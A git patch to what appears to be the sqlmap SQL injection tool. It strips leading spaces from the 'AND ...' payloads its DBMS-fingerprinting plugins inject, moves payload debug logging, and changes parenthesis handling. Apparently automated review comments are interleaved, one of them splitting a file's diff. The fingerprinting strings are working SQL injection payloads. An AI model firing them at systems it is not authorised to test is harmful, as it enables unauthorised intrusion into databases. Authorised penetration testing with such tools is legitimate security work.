From d3e7e89e60da472fd076c111d357630d0819a78f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sun, 7 Nov 2010 21:18:09 +0000
Subject: [PATCH] major improvement with display of payloads (all payloads are displayed now) and removal of "pesky" spaces
---
 lib/core/agent.py | 4 ++--
 lib/request/connect.py | 5 +++++
 lib/request/inject.py | 3 ---
 lib/techniques/blind/inference.py | 3 ---
 lib/techniques/error/use.py | 3 ---
 lib/techniques/inband/union/use.py | 3 ---
 lib/utils/parenthesis.py | 4 ++--
 plugins/dbms/access/fingerprint.py | 4 ++--
 plugins/dbms/firebird/fingerprint.py | 14 +++++++-------
 plugins/dbms/maxdb/fingerprint.py | 4 ++--
 plugins/dbms/mssqlserver/fingerprint.py | 8 ++++----
 plugins/dbms/mysql/fingerprint.py | 4 ++--
 plugins/dbms/oracle/fingerprint.py | 4 ++--
 plugins/dbms/postgresql/fingerprint.py | 4 ++--
 plugins/dbms/sqlite/fingerprint.py | 4 ++--
 plugins/dbms/sybase/fingerprint.py | 6 +++---
 16 files changed, 35 insertions(+), 42 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 5826caf80..96200b978 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -36,8 +36,8 @@ class Agent:
 kb.misc.stop = randomStr(6)
 def payloadDirect(self, query):
- if query.startswith(" AND "):
- query = query.replace(" AND ", "SELECT ", 1)
+ if query.startswith("AND "):
+ query = query.replace("AND ", "SELECT ", 1)
 elif query.startswith(" UNION ALL "):
 query = query.replace(" UNION ALL ", "", 1)
 elif query.startswith("; "):
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 0d52f68e6..2384c60cf 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -318,6 +318,11 @@ class Connect:
 value = agent.replacePayload(value, payload)
+ payload = agent.extractPayload(value)
+ if payload:
+ debugMsg = "payload: %s" % payload
+ logger.debug(debugMsg)
+
 if place == "Cookie" and conf.cookieUrlencode:
 value = agent.removePayloadDelimiters(value, False)
 value = urlEncodeCookieValues(value)
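Review bot: The new `if query.startswith("AND ")` branch in payloadDirect is now out of step with the `elif query.startswith(" UNION ALL ")` and `elif query.startswith("; ")` branches directly below it, which still expect the leading-space form this commit strips from every `AND` payload in the plugin hunks. If the `UNION ALL` and stacked prefixes are later normalised the same way, those branches silently stop matching and the query is returned unconverted; if they are meant to keep their space, that asymmetry deserves a comment, e.g. `# "AND " payloads carry no leading space; UNION/stacked prefixes still do`. Keeping the conversions in one prefix table (`(("AND ", "SELECT "), (" UNION ALL ", ""), ...)`) would make the contract visible in one place. payloadDirect's body continues outside the hunk.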
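Review bot: The added `payload = agent.extractPayload(value)` rebinds the `payload` name that `agent.replacePayload(value, payload)` consumed on the line above, so any later use of `payload` in this method (which starts and ends outside the hunk) now sees the re-extracted string rather than the one the caller passed in. The debug lines should use their own local, e.g. `extractedPayload = agent.extractPayload(value)` / `if extractedPayload:` / `logger.debug("payload: %s" % extractedPayload)`. Note also that the log line runs before the `Cookie` branch below strips delimiters and URL-encodes `value`, so what is logged is the logical payload, not necessarily the bytes sent; a short comment saying so would prevent confusion when someone compares the debug output against a traffic capture.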
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 42dbe9ad4..35b4b4576 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -399,9 +399,6 @@ def goStacked(expression, silent=False):
 query = agent.prefixQuery("; %s" % expression)
 query = agent.postfixQuery("%s;%s" % (query, comment))
- debugMsg = "query: %s" % query
- logger.debug(debugMsg)
-
 payload = agent.payload(newValue=query)
 page, _ = Request.queryPage(payload, content=True, silent=silent)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 22fb411d2..e313bcd8e 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -75,9 +75,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 else:
 expressionUnescaped = unescaper.unescape(expression)
- debugMsg = "query: %s" % expressionUnescaped
- logger.debug(debugMsg)
-
 if length and not isinstance(length, int) and length.isdigit():
 length = int(length)
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 7639adbdd..e7ee248e0 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -64,9 +64,6 @@ def errorUse(expression, returnPayload=False):
 forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
- debugMsg = "query: %s" % forgedQuery
- logger.debug(debugMsg)
-
 payload = agent.payload(newValue=forgedQuery)
 result = Request.queryPage(payload, content=True)
 match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py
index c87ec8869..6a03d17b4 100644
--- a/lib/techniques/inband/union/use.py
+++ b/lib/techniques/inband/union/use.py
@@ -197,9 +197,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
 query = agent.forgeInbandQuery(expression, nullChar=nullChar)
 payload = agent.payload(newValue=query)
- debugMsg = "query: %s" % query
- logger.debug(debugMsg)
-
 # Perform the request
 resultPage, _ = Request.queryPage(payload, content=True)
 reqCount += 1
diff --git a/lib/utils/parenthesis.py b/lib/utils/parenthesis.py
index dda984b67..04b1572e5 100644
--- a/lib/utils/parenthesis.py
+++ b/lib/utils/parenthesis.py
@@ -45,8 +45,8 @@ def checkForParenthesis():
 randInt = randomInt()
 randStr = randomStr()
- query = case.usage.prefix.format % eval(case.usage.prefix.params) +\
- case.usage.postfix.format % eval(case.usage.postfix.params)
+ query = case.usage.prefix.format % eval(case.usage.prefix.params)
+ query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 8602e2a6a..a625959eb 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -161,14 +161,14 @@ class Fingerprint(GenericFingerprint):
 logMsg = "testing Microsoft Access"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND VAL(CVAR(1))=1")
+ payload = agent.fullPayload("AND VAL(CVAR(1))=1")
 result = Request.queryPage(payload)
 if result:
 logMsg = "confirming Microsoft Access"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
+ payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index edb02ba39..2dc68ce73 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
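Review bot: In checkForParenthesis, `query = query[:-1] + case.usage.postfix.format % ...` discards the last character of the expanded prefix unconditionally, with nothing asserting that the character is the separator space the commit is removing elsewhere; a prefix format that ends in anything else loses a significant character, and one that already has no trailing space does too. An explicit strip documents the intent and is safe in both cases: `query = query.rstrip(" ") + case.usage.postfix.format % eval(case.usage.postfix.params)`, with a comment such as `# postfix formats supply their own separator; drop the prefix's trailing space`. The two `eval(...)` calls on the `params` strings are carried over from the old lines rather than introduced here, but they are a good reason to keep the case definitions under the project's control only.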
@@ -72,10 +72,10 @@ class Fingerprint(GenericFingerprint):
 def __sysTablesCheck(self):
 retVal = None
 table = (
- ("1.0", [" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
- ("1.5", [" AND NULLIF(%d,%d) IS NULL", " AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
- ("2.0", [" AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", " AND BIT_LENGTH(%d)>0", " AND CHAR_LENGTH(%d)>0"]),
- ("2.1", [" AND BIN_XOR(%d,%d)=0", " AND PI()>0.%d", " AND RAND()<1.%d", " AND FLOOR(1.%d)>=0"])
+ ("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
+ ("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
+ ("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]),
+ ("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"])
 )
 for i in xrange(len(table)):
@@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint):
 def __dialectCheck(self):
 retVal = None
 if kb.dbms:
- payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
+ payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
 result = Request.queryPage(payload)
 retVal = "dialect 3" if result else "dialect 1"
 return retVal
@@ -116,14 +116,14 @@ class Fingerprint(GenericFingerprint):
 randInt = randomInt()
- payload = agent.fullPayload(" AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
+ payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
 result = Request.queryPage(payload)
 if result:
 logMsg = "confirming Firebird"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
+ payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index e105d7125..7278d90df 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -118,14 +118,14 @@ class Fingerprint(GenericFingerprint):
 randInt = randomInt()
- payload = agent.fullPayload(" AND NOROUND(%d)=%d" % (randInt, randInt))
+ payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt))
 result = Request.queryPage(payload)
 if result:
 logMsg = "confirming SAP MaxDB"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
+ payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 5bbeda926..1e6399dcd 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint):
 result = True
 else:
 randInt = randomInt()
- payload = agent.fullPayload(" AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
+ payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
 result = Request.queryPage(payload)
 if result:
@@ -99,10 +99,10 @@ class Fingerprint(GenericFingerprint):
 for version in (0, 5, 8):
 randInt = randomInt()
- query = " AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
+ query = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
 if conf.direct:
- query = query.replace(" AND ", "SELECT 1 WHERE ", 1)
+ query = query.replace("AND ", "SELECT 1 WHERE ", 1)
 payload = agent.fullPayload(query)
 result = Request.queryPage(payload)
@@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint):
 break
 else:
- query = " AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
+ query = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
 payload = agent.fullPayload(query)
 result = Request.queryPage(payload)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 828f21af2..490712ee4 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -156,14 +156,14 @@ class Fingerprint(GenericFingerprint):
 logger.info(infoMsg)
 randInt = getUnicode(randomInt(1))
- payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+ payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()")
 result = Request.queryPage(payload)
 if result:
 infoMsg = "confirming MySQL"
 logger.info(infoMsg)
- payload = agent.fullPayload(" AND ISNULL(1/0)" if kb.injPlace != "URI" else " AND ISNULL(1 DIV 0)")
+ payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injPlace != "URI" else "AND ISNULL(1 DIV 0)")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index 345847542..3f327038b 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint):
 if conf.direct:
 result = True
 else:
- payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
+ payload = agent.fullPayload("AND ROWNUM=ROWNUM")
 result = Request.queryPage(payload)
 if result:
@@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint):
 if conf.direct:
 result = True
 else:
- payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+ payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index bbc517bb4..12fccd336 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -86,14 +86,14 @@ class Fingerprint(GenericFingerprint):
 randInt = getUnicode(randomInt(1))
- payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+ payload = agent.fullPayload("AND %s::int=%s" % (randInt, randInt))
 result = Request.queryPage(payload)
 if result:
 infoMsg = "confirming PostgreSQL"
 logger.info(infoMsg)
- payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+ payload = agent.fullPayload("AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index 4324e4fda..a1a85891b 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -80,14 +80,14 @@ class Fingerprint(GenericFingerprint):
 logMsg = "testing SQLite"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
+ payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
 result = Request.queryPage(payload)
 if result:
 logMsg = "confirming SQLite"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND SQLITE_VERSION()=SQLITE_VERSION()")
+ payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()")
 result = Request.queryPage(payload)
 if not result:
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index 465420b7e..c38d6233b 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -79,14 +79,14 @@ class Fingerprint(GenericFingerprint):
 if conf.direct:
 result = True
 else:
- payload = agent.fullPayload(" AND tempdb_id()=tempdb_id()")
+ payload = agent.fullPayload("AND tempdb_id()=tempdb_id()")
 result = Request.queryPage(payload)
 if result:
 logMsg = "confirming Sybase"
 logger.info(logMsg)
- payload = agent.fullPayload(" AND suser_id()=suser_id()")
+ payload = agent.fullPayload("AND suser_id()=suser_id()")
 result = Request.queryPage(payload)
 if not result:
@@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint):
 for version in range(12, 16):
 randInt = randomInt()
- query = " AND @@VERSION_NUMBER/1000=%d" % version
+ query = "AND @@VERSION_NUMBER/1000=%d" % version
 payload = agent.fullPayload(query)
 result = Request.queryPage(payload)
 if result: